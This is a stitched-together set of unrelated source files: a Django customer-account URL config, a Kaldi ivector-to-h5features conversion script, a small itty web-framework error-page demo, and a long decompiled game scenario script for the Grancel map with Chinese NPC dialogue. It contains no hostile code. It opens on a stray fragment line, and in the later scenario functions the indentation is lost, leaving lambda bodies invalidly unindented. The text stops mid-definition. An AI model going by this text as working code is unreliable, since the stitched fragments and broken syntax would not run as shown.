            mod_time = txt_to_csv.modification_date()
|
from django.conf import settings
from django.conf.urls.static import static
from django.urls import path
from . import views
# URL namespace for reversing, e.g. reverse("customer:home").
app_name = 'customer'

urlpatterns = [
    # NOTE(review): the view name "create_cutomer" looks misspelled; renaming
    # it requires changing the views module at the same time.
    path('create-customer/', views.create_cutomer, name='create_customer'),
    path('', views.home, name='home'),
    path('login-customer/', views.login_customer, name='login_customer'),
    path('logout-customer/', views.logout_customer, name='logout_customer'),
    path('profile-customer/', views.profile_customer, name='profile_customer'),
    path('customer-change-password/', views.customer_change_password, name='customer_change_password'),
    path('customer-forgot-password/', views.customer_forgot_password, name='customer_forgot_password'),
    path('customer-reset-password/', views.customer_reset_password, name='customer_reset_password'),
    path('create-staff/', views.create_staff, name='create_staff'),
] + static(settings.STATIC_URL,
           document_root=settings.STATIC_ROOT)  # is this import of setting correct? check this later
|
#!/usr/bin/env python
import numpy as np
import kaldiio
from ABXpy.misc import any2h5features
import os, shutil
#read from feats.scp
#add feats scp direc
if __name__ == "__main__":
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("feats_file", help="path to the ivector.scp we're going to use as example")
    parser.add_argument("target_dir", help="path to target dir")
    parser.add_argument("--output_name", type=str, default="ivector.h5f", help="name to output file (ivectors.h5f or lda_ivectors.h5f")
    # BUG FIX: the original called parser.parse_args() and discarded the
    # result immediately before parse_known_args(); the redundant call has
    # been removed.
    args, leftovers = parser.parse_known_args()
    print(args.output_name)

    # Start from a clean slate: remove any stale tmp dir and output file.
    try:
        shutil.rmtree('{}/tmp'.format(args.target_dir))
    except OSError:
        # Narrowed from a bare except: only a missing/busy directory is
        # expected here, and that is safe to ignore.
        pass
    if os.path.exists('{}/{}'.format(args.target_dir, args.output_name)):
        os.remove('{}/{}'.format(args.target_dir, args.output_name))
    os.makedirs('{}/tmp'.format(args.target_dir))

    # Dump every ivector from the Kaldi scp as a per-utterance .npz file
    # (features plus a dummy single-frame time axis).
    with kaldiio.ReadHelper('scp:{}'.format(args.feats_file)) as reader:
        filenames = []
        times = np.array([0])
        for key, numpy_array in reader:
            filenames.append(key)
            ivector_2d = np.expand_dims(numpy_array.astype(np.float64), axis=0)
            np.savez('{}/tmp/{}'.format(args.target_dir, key), features=ivector_2d, time=times)
    # Convert the directory of .npz files into a single h5features archive.
    any2h5features.convert('{}/tmp/'.format(args.target_dir), '{}/{}'.format(args.target_dir, args.output_name))
    print(args.target_dir, args.output_name)
    # shutil.rmtree('{}/tmp'.format(args.target_dir))
|
from itty import *
@error(500)
def my_great_500(request, exception):
    """Custom HTTP 500 handler: render the exception in a small HTML page."""
    # NOTE(review): the exception text is interpolated into HTML unescaped —
    # fine for this demo, but escape it if exception text could ever carry
    # user-controlled content.
    html_output = """
    <html>
        <head>
            <title>Application Error! OH NOES!</title>
        </head>
        <body>
            <h1>OH NOES!</h1>
            <p>Yep, you broke it.</p>
            <p>Exception: %s</p>
        </body>
    </html>
    """ % exception
    response = Response(html_output, status=500)
    return response.send(request._start_response)
@register('get', '/hello')
def hello(request):
    """Plain success route (also the target of the redirect test)."""
    return 'Hello errors!'
@register('get', '/test_404')
def test_404(request):
    """Demonstrate 404 handling; the return is intentionally unreachable."""
    raise NotFound('Not here, sorry.')
    return 'This should never happen.'
@register('get', '/test_500')
def test_500(request):
    """Demonstrate the custom 500 handler; the return is intentionally unreachable."""
    raise ServerError('Oops.')
    return 'This should never happen either.'
@register('get', '/test_other')
def test_other(request):
    """Demonstrate handling of a non-HTTP exception; return is unreachable."""
    raise RuntimeError('Oops.')
    return 'This should never happen either either.'
@register('get', '/test_403')
def test_403(request):
    """Demonstrate 403 handling; the return is intentionally unreachable."""
    raise Forbidden('No soup for you!')
    return 'This should never happen either either either.'
@register('get', '/test_redirect')
def test_redirect(request):
    """Demonstrate an HTTP redirect to the /hello route."""
    raise Redirect('/hello')

# Start the itty development server.
run_itty()
|
from ED6ScenarioHelper import *
def main():
    """Scena (map script) header for Grancel map T4222.

    Machine-generated (decompiled) data: declares the scenario file header,
    the NPC display-name table, the map entry point, character sprite
    resources, NPC placements, and the script-function offset table.
    Values mirror the compiled binary and must not be edited casually.
    """
    # Grancel
    CreateScenaFile(
        FileName = 'T4222 ._SN',   # padded 8.3-style archive name — spacing is intentional
        MapName = 'Grancel',
        Location = 'T4222.x',
        MapIndex = 1,
        MapDefaultBGM = "ed60017",
        Flags = 0,
        EntryFunctionIndex = 0xFFFF,
        Reserved = 0,
        IncludedScenario = [
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            ''
        ],
    )

    # NPC display names (game text, kept verbatim); indices 8.. map to the
    # DeclNpc entries below.
    BuildStringList(
        '@FileName', # 8
        '克劳斯市长', # 9
        '莉拉', # 10
        '梅贝尔市长', # 11
        '科林兹校长', # 12
        '茜亚', # 13
        '金', # 14
        '里拉老人', # 15
        '布莉姆', # 16
    )

    # Map entry point: camera/position defaults plus the init (0) and entry
    # (1) script-function indices.
    DeclEntryPoint(
        Unknown_00 = 0,
        Unknown_04 = 0,
        Unknown_08 = 6000,
        Unknown_0C = 4,
        Unknown_0E = 0,
        Unknown_10 = 0,
        Unknown_14 = 9500,
        Unknown_18 = -10000,
        Unknown_1C = 0,
        Unknown_20 = 0,
        Unknown_24 = 0,
        Unknown_28 = 2800,
        Unknown_2C = 262,
        Unknown_30 = 45,
        Unknown_32 = 0,
        Unknown_34 = 360,
        Unknown_36 = 0,
        Unknown_38 = 0,
        Unknown_3A = 0,
        InitScenaIndex = 0,
        InitFunctionIndex = 0,
        EntryScenaIndex = 0,
        EntryFunctionIndex = 1,
    )

    # Character sprite (chip) resources; index comments match ChipIndex below.
    AddCharChip(
        'ED6_DT07/CH02350 ._CH', # 00
        'ED6_DT07/CH02370 ._CH', # 01
        'ED6_DT07/CH02360 ._CH', # 02
        'ED6_DT07/CH02600 ._CH', # 03
        'ED6_DT07/CH02620 ._CH', # 04
        'ED6_DT07/CH02540 ._CH', # 05
        'ED6_DT07/CH00070 ._CH', # 06
        'ED6_DT07/CH02460 ._CH', # 07
        'ED6_DT07/CH02230 ._CH', # 08
        'ED6_DT07/CH02240 ._CH', # 09
        'ED6_DT07/CH01100 ._CH', # 0A
        'ED6_DT07/CH01350 ._CH', # 0B
    )

    # Matching sprite pattern files (one per chip above).
    AddCharChipPat(
        'ED6_DT07/CH02350P._CP', # 00
        'ED6_DT07/CH02370P._CP', # 01
        'ED6_DT07/CH02360P._CP', # 02
        'ED6_DT07/CH02600P._CP', # 03
        'ED6_DT07/CH02620P._CP', # 04
        'ED6_DT07/CH02540P._CP', # 05
        'ED6_DT07/CH00070P._CP', # 06
        'ED6_DT07/CH02460P._CP', # 07
        'ED6_DT07/CH02230P._CP', # 08
        'ED6_DT07/CH02240P._CP', # 09
        'ED6_DT07/CH01100P._CP', # 0A
        'ED6_DT07/CH01350P._CP', # 0B
    )

    # NPC placements. X/Z/Y of 0 means the NPC is positioned by script;
    # -1 function/scena indices mean "no handler".
    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 0,
        ChipIndex = 0x0,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 6,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 1,
        ChipIndex = 0x1,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 7,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 2,
        ChipIndex = 0x2,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 8,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 3,
        ChipIndex = 0x3,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 5,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 5,
        ChipIndex = 0x5,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = 0,
        Z = 0,
        Y = 0,
        Direction = 180,
        Unknown2 = 0,
        Unknown3 = 6,
        ChipIndex = 0x6,
        NpcIndex = 0x181,
        InitFunctionIndex = -1,
        InitScenaIndex = -1,
        TalkFunctionIndex = -1,
        TalkScenaIndex = -1,
    )

    DeclNpc(
        X = -139550,
        Z = 4000,
        Y = 9480,
        Direction = 0,
        Unknown2 = 0,
        Unknown3 = 10,
        ChipIndex = 0xA,
        NpcIndex = 0x101,
        InitFunctionIndex = 0,
        InitScenaIndex = 2,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 4,
    )

    DeclNpc(
        X = -78950,
        Z = 0,
        Y = 5960,
        Direction = 359,
        Unknown2 = 0,
        Unknown3 = 11,
        ChipIndex = 0xB,
        NpcIndex = 0x181,
        InitFunctionIndex = 0,
        InitScenaIndex = 2,
        TalkFunctionIndex = 0,
        TalkScenaIndex = 3,
    )

    # Script function offset table: names encode the byte offset of each
    # Function_N below in the compiled scenario.
    ScpFunction(
        "Function_0_20A", # 00, 0
        "Function_1_358", # 01, 1
        "Function_2_362", # 02, 2
        "Function_3_378", # 03, 3
        "Function_4_3D9", # 04, 4
        "Function_5_59A", # 05, 5
        "Function_6_5A7", # 06, 6
        "Function_7_EE3", # 07, 7
        "Function_8_EF0", # 08, 8
        "Function_9_187E", # 09, 9
        "Function_10_2539", # 0A, 10
        "Function_11_2574", # 0B, 11
        "Function_12_2FB0", # 0C, 12
        "Function_13_358A", # 0D, 13
        "Function_14_3737", # 0E, 14
    )
def Function_0_20A(): pass

label("Function_0_20A")

# Map init dispatcher. First: fire pending one-shot events — if a "queued"
# scenario flag is set, clear it (OP_A3 presumably clears the flag bit —
# TODO confirm opcode semantics) and run the corresponding event function.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 2)), scpexpr(EXPR_END)), "loc_218")
OP_A3(0x3FA)
Event(0, 9)

label("loc_218")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 3)), scpexpr(EXPR_END)), "loc_226")
OP_A3(0x3FB)
Event(0, 12)

label("loc_226")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x7F, 4)), scpexpr(EXPR_END)), "loc_234")
OP_A3(0x3FC)
Event(0, 14)

label("loc_234")

# During the chapter window where flag 0xC7/1 is set but 0xC8/0 is not,
# show NPCs 0x8-0xB at fixed positions (clear their hidden flag 0x80).
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 1)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_298")
ClearChrFlags(0x8, 0x80)
ClearChrFlags(0x9, 0x80)
ClearChrFlags(0xA, 0x80)
ClearChrFlags(0xB, 0x80)
SetChrPos(0xA, -28870, 0, 53540, 270)
SetChrPos(0x9, -28040, 0, 54950, 211)
SetChrPos(0xB, -83970, 0, -52980, 270)
SetChrPos(0x8, -86020, 0, -52980, 90)

label("loc_298")

# Branch on value-index 0 (presumably the map/entrance id we arrived from —
# TODO confirm): 106 and 101 each gate a one-shot event behind flag checks.
Switch(
    (scpexpr(EXPR_PUSH_VALUE_INDEX, 0x0), scpexpr(EXPR_END)),
    (106, "loc_2A8"),
    (101, "loc_2CA"),
    (SWITCH_DEFAULT, "loc_2E0"),
)

label("loc_2A8")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 3)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 4)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 6)), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_2C7")
OP_A2(0x63F)
Event(0, 11)

label("loc_2C7")

Jump("loc_2E0")

label("loc_2CA")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 7)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_2DD")
OP_A2(0x640)
Event(0, 13)

label("loc_2DD")

Jump("loc_2E0")

label("loc_2E0")

# Swap party leads (0x0, 0x1, 0x138) onto formal-wear chips 7-9 during the
# banquet window (0xC8/2 set, 0xC8/6 not yet set).
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 2)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_30A")
SetChrChipByIndex(0x0, 7)
SetChrChipByIndex(0x1, 8)
SetChrChipByIndex(0x138, 9)
SetChrFlags(0x0, 0x1000)
SetChrFlags(0x1, 0x1000)
SetChrFlags(0x138, 0x1000)

label("loc_30A")

# Story-progress ladder (checked newest-first): toggle visibility of NPCs
# 0xE/0xF depending on which chapter flag is the furthest one set.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 7)), scpexpr(EXPR_END)), "loc_319")
SetChrFlags(0xE, 0x80)
Jump("loc_357")

label("loc_319")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 3)), scpexpr(EXPR_END)), "loc_328")
ClearChrFlags(0xF, 0x80)
Jump("loc_357")

label("loc_328")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 6)), scpexpr(EXPR_END)), "loc_337")
SetChrFlags(0xE, 0x80)
Jump("loc_357")

label("loc_337")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 2)), scpexpr(EXPR_END)), "loc_346")
SetChrFlags(0xE, 0x80)
Jump("loc_357")

label("loc_346")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_END)), "loc_350")
Jump("loc_357")

label("loc_350")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 1)), scpexpr(EXPR_END)), "loc_357")

label("loc_357")

Return()

# Function_0_20A end
def Function_1_358(): pass

label("Function_1_358")

# Map entry hook (entry function index 1): writes 0xFF into work slot 0x2B
# via OP_4F — exact opcode semantics not documented here; TODO confirm.
OP_4F(0x2B, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Return()

# Function_1_358 end
def Function_2_362(): pass

label("Function_2_362")

# NPC idle loop: the Jc condition is the constant 1, so this repeats OP_99
# (presumably a frame-range animation, frames 0..7, 1500 ms — TODO confirm)
# forever; loc_377/Return is unreachable by design.
Jc((scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_END)), "loc_377")
OP_99(0xFE, 0x0, 0x7, 0x5DC)
Jump("Function_2_362")

label("loc_377")

Return()

# Function_2_362 end
def Function_3_378(): pass

label("Function_3_378")

# Talk handler (TalkScenaIndex 3): two short lines from the speaking NPC
# (0xFE = the NPC this handler is attached to) about cleaning guest rooms.
# Dialogue text is game data — kept verbatim.
TalkBegin(0xFE)

ChrTalk(
    0xFE,
    "嗯,接下来是打扫客房。\x02",
)

CloseMessageWindow()

ChrTalk(
    0xFE,
    (
        "因为今天有许多客人要在城里留宿,\x01",
        "所以要做的准备不少啊~\x02",
    )
)

CloseMessageWindow()
TalkEnd(0xFE)
Return()

# Function_3_378 end
def Function_4_3D9(): pass

label("Function_4_3D9")

# Talk handler (TalkScenaIndex 4): dialogue varies with story progress,
# checked newest-flag-first; most earlier/later stages fall straight through
# to loc_596. Speaker appears to be the castle librarian (dialogue concerns
# books taken by the Intelligence Division) — inferred from text, confirm.
TalkBegin(0xFE)

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 7)), scpexpr(EXPR_END)), "loc_3E6")
Jump("loc_596")

label("loc_3E6")

# Flag 0xCD/3: the confiscated books have been returned.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xCD, 3)), scpexpr(EXPR_END)), "loc_495")

ChrTalk(
    0xFE,
    (
        "《王城设计图》、《七至宝》、\x01",
        "《百日战役全貌》……\x02",
    )
)

CloseMessageWindow()

ChrTalk(
    0xFE,
    (
        "哎呀呀,\x01",
        "被情报部拿走的这些书\x01",
        "终于又回来了。\x02",
    )
)

CloseMessageWindow()
Jump("loc_596")

label("loc_495")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 6)), scpexpr(EXPR_END)), "loc_49F")
Jump("loc_596")

label("loc_49F")

Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 2)), scpexpr(EXPR_END)), "loc_4A9")
Jump("loc_596")

label("loc_4A9")

# Flag 0xC8/0: the castle blueprints have also gone missing.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC8, 0)), scpexpr(EXPR_END)), "loc_510")

ChrTalk(
    0xFE,
    (
        "完了,\x01",
        "格兰赛尔城的设计图纸竟然也不见了。\x02",
    )
)

CloseMessageWindow()

ChrTalk(
    0xFE,
    (
        "情报部的家伙\x01",
        "究竟打算拿去做什么啊。\x02",
    )
)

CloseMessageWindow()
Jump("loc_596")

label("loc_510")

# Flag 0xC7/1: earliest stage — complaining that restricted materials were
# taken by force.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 1)), scpexpr(EXPR_END)), "loc_596")

ChrTalk(
    0xFE,
    (
        "情报部的那群家伙,\x01",
        "到底要做什么啊。\x02",
    )
)

CloseMessageWindow()

ChrTalk(
    0xFE,
    (
        "竟然把严禁外借的\x01",
        "重要资料强行取走了……\x02",
    )
)

CloseMessageWindow()

label("loc_596")

TalkEnd(0xFE)
Return()

# Function_4_3D9 end
def Function_5_59A(): pass

label("Function_5_59A")

# Talk wrapper: if event flag 0xC7/3 is not yet set, run the one-shot
# Function 6 event (which sets the flag itself); otherwise do nothing.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_5A6")
Call(0, 6)

label("loc_5A6")

Return()

# Function_5_59A end
def Function_6_5A7(): pass
label("Function_6_5A7")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 3)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_EE2")
OP_A2(0x63B)
EventBegin(0x0)
Fade(1000)
SetChrPos(0x101, -85860, 0, -55170, 0)
SetChrPos(0x102, -84960, 0, -55250, 0)
OP_6D(-85030, 450, -53200, 1000)
ChrTalk(
0x8,
(
"#600F哦哦,来了吗。\x01",
"艾丝蒂尔、约修亚,\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
"#780F呵呵,好久不见了。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F哎……校长先生!?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F难道校长先生您\x01",
"也被邀请参加晚宴吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F是啊,就是乘今天的定期船\x01",
"从卢安赶过来的呢。\x02\x03",
"我已经听说了,\x01",
"你们不是获得武术大会的冠军了吗?\x02\x03",
"学生们听到了肯定也会十分高兴的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F嘿嘿……\x01",
"真的非常感谢您。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F不过,只凭我们自己的力量\x01",
"是不可能赢的。\x02\x03",
"说起来,我没有想到\x01",
"校长也会被邀请来呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F科林兹校长作为\x01",
"利贝尔首屈一指的贤者,\x01",
"每年都会出席王国会议呢。\x02\x03",
"被邀请出席晚宴\x01",
"也没有什么奇怪的啦。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F哈哈,说我是贤者,\x01",
"真是太过誉了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F嗯……王国会议是什么?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F是为解决整个王国范围的问题,\x01",
"而召开的一年一度的例会。\x02\x03",
"女王陛下、各地区的市长,\x01",
"以及各界的代表人士齐聚一堂,\x01",
"讨论和协商各种各样的问题。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F哎~是这样啊。\x02\x03",
"那么,今天的晚宴邀请的\x01",
"都是这些人啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F不……\x01",
"其实连一半都不到。\x02\x03",
"女王陛下身体欠佳,\x01",
"摩尔根将军忙于军务……\x02\x03",
"卢安的戴尔蒙市长\x01",
"也因为那个案件被逮捕了。\x02\x03",
"还有,拉赛尔博士也……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F和他相关的那个案件,\x01",
"现在还有很多地方没有弄清楚呢。\x02\x03",
"不仅牵扯到了亲卫队,\x01",
"还说是大规模的恐怖组织所为,\x01",
"到底有多少是真相啊……\x02\x03",
"真是的,在这种情况下,\x01",
"还有心思召开什么晚宴。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F………………………………\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F………………………………\x02",
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F不过,为了确认\x01",
"公爵阁下真正的心意,\x01",
"也有出席这次晚宴的必要。\x02\x03",
"而且,还要借此机会\x01",
"探望和问候女王陛下。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F嗯嗯。\x01",
"这个才是最重要的呢。\x02\x03",
"来到这格兰赛尔城,\x01",
"不能拜见陛下\x01",
"这不是扯的么。\x02\x03",
"而且,也很久没有见到\x01",
"科洛蒂娅公主了呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F科洛蒂娅公主……\x01",
"我记得是女王陛下的孙女吧。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F公主殿下\x01",
"也住在格兰赛尔城吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x8,
(
"#600F不,平常是住在\x01",
"另外一个地方的。\x02\x03",
"不过,听说几天前\x01",
"回到王都来了呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F哎~是这样啊……\x02\x03",
"嗯~如果有机会,\x01",
"一定要和她见上一面呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xB,
(
"#780F呵呵,如果是你们,\x01",
"肯定能见到她的。\x02",
)
)
CloseMessageWindow()
EventEnd(0x0)
label("loc_EE2")
Return()
# Function_6_5A7 end
def Function_7_EE3(): pass

label("Function_7_EE3")

# Talk wrapper: if event flag 0xC7/2 is not yet set, run the one-shot
# Function 8 event (which sets the flag itself); otherwise do nothing.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_EEF")
Call(0, 8)

label("loc_EEF")

Return()

# Function_7_EE3 end
def Function_8_EF0(): pass
label("Function_8_EF0")
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xC7, 2)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_187D")
OP_A2(0x63A)
EventBegin(0x0)
EventBegin(0x0)
Fade(1000)
SetChrPos(0x101, -29280, 0, 55240, 135)
SetChrPos(0x102, -30310, 0, 54780, 135)
OP_6D(-28840, 0, 54560, 1000)
ChrTalk(
0x101,
"#000F啊……梅贝尔市长!?\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F莉拉小姐也来了啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x9,
"#620F艾丝蒂尔小姐,约修亚先生……\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F呵呵,我们又见面了呢。\x02\x03",
"我一直等着\x01",
"你们两个的到来呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F梅贝尔市长\x01",
"果然也被邀请参加晚宴呢。\x02\x03",
"哎,\x01",
"为什么会知道我们要来……?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F我是听克劳斯市长说的。\x02\x03",
"你们在武术大会中获得优胜,\x01",
"从而被邀请出席晚宴。\x02\x03",
"啊~如果早知道的话,\x01",
" \x01",
"来给你们加油了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x9,
(
"#620F小姐,话虽这么说……\x02\x03",
"如果这样,之后小姐自己\x01",
"不是要非常辛苦了?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
"#610F呜~我知道啦。\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#000F啊哈哈……\x01",
" \x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F真是的,女王陛下暂且不论,\x01",
"那个公爵举办的晚宴,\x01",
"本来就没有什么闲工夫来参加啊……\x02\x03",
"都是因为那个军队的女士官\x01",
"固执地催促让我出席,\x01",
"实在没办法才来王都的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F是情报部的凯诺娜上尉吧?\x02",
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F嗯,就是她。\x02\x03",
"虽然很有礼貌,其实不把人放在眼里,\x01",
"我真是不喜欢那个人呢。\x02\x03",
"最近,也没办法\x01",
"和摩尔根将军取得联系……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F那是……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F和哈肯门那边\x01",
"联系不上吗?\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F坚持说『将军不在』,\x01",
"让我吃了闭门羹。\x02\x03",
"好像是为了应对恐怖事件,\x01",
"工作相当地繁忙呢。\x02\x03",
"本来还想能不能\x01",
"在今天的晚宴上见面呢……\x02\x03",
"看起来好像也没有出席呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F是这样吗……\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F市长对这件事是怎么想的?\x02\x03",
"在这个时候把市长们召集起来\x01",
"召开这样的晚宴……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F是呢……\x02\x03",
"如果是女王陛下举办的话,\x01",
"应该是要宣布重要的事情吧……\x02\x03",
"不过这次大概只是为了\x01",
"陪公爵阁下打发时间而已。\x02\x03",
"滥用陛下代理人的特权,\x01",
"让人认为他大权在握而已。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#000F哇~真是精辟啊。\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F不过,\x01",
"也有可能不只是为这样的理由。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0xA,
(
"#610F算了,听说这里的西餐\x01",
"是整个王国最棒的……\x02\x03",
"享用完美味的晚餐,\x01",
"探望一下女王陛下,\x01",
"然后就赶快回柏斯吧。\x02",
)
)
CloseMessageWindow()
EventEnd(0x0)
label("loc_187D")
Return()
# Function_8_EF0 end
def Function_9_187E(): pass
label("Function_9_187E")
EventBegin(0x0)
SetChrPos(0x101, -52050, 0, 2040, 0)
SetChrPos(0x102, -52050, 0, 2040, 0)
SetChrPos(0x108, -52050, 0, 2040, 0)
SetChrPos(0xC, -52050, 0, 2040, 0)
ClearChrFlags(0xC, 0x80)
SetChrFlags(0xC, 0x40)
OP_69(0x102, 0x0)
OP_6A(0x102)
def lambda_18DE():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0xC, 1, lambda_18DE)
Sleep(500)
def lambda_18FE():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x102, 1, lambda_18FE)
Sleep(500)
def lambda_191E():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x101, 1, lambda_191E)
Sleep(500)
def lambda_193E():
OP_8E(0xFE, 0xFFFECE9C, 0x0, 0x884, 0xBB8, 0x0)
ExitThread()
QueueWorkItem(0x108, 1, lambda_193E)
WaitChrThread(0xC, 0x1)
def lambda_195E():
